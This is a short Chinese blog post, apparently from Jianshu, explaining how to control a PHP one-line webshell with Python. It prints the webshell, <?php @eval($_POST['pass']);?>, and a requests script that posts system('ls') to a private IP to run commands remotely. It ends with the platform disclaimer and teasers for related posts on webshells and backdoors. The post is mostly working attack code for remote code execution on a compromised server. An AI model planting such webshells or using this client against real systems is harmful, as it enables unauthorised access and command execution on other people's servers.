使用python鏈接一句話木馬的簡單操作

import requests
url="http://10.2.0.113"
shell='/system.php'
passwd="pass"
port='80'
payload={
    passwd:'system(\'ls \');'
}
url1=url+':'+port+shell
print(url1)
response=requests.post(url1,payload,timeout=1)
print(response.text)

原理是在<?php @eval($_POST['pass']);?>這樣的一句話木馬中,通過給pass這個值賦予內容會在eval中被解析成php進行執行,只要通過post將php語法賦予pass就能在php環境中被執行,這里執行的是ls查看文件列表。

?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。

推薦閱讀更多精彩內容

  • (源自摘抄整理)https://www.91ri.org/11494.html Webshell實現與隱藏探究 一...
    JackyTsuuuy閱讀 20,904評論 2 13
  • 在滲透測試的后期,為了維持權限。我們通常都會選擇使用大小馬或者通過添加賬戶等各種各樣的方式給自己留個后門。但是事情...
    自我陶醉閱讀 5,265評論 0 3
  • PHP代碼執行函數 eval & assert & preg_replace eval 函數 php官方手冊:ht...
    xaviershun閱讀 5,100評論 1 12
  • php.ini設置,上傳大文件: post_max_size = 128Mupload_max_filesize ...
    bycall閱讀 6,822評論 3 64
  • 今天早上7:48,老婆讓我摸她的肚子,已經明顯地摸到了胎動,挺激動的。確實三五天前也好像摸的到胎動,但是這次是非常...
    JimMeng閱讀 368評論 0 0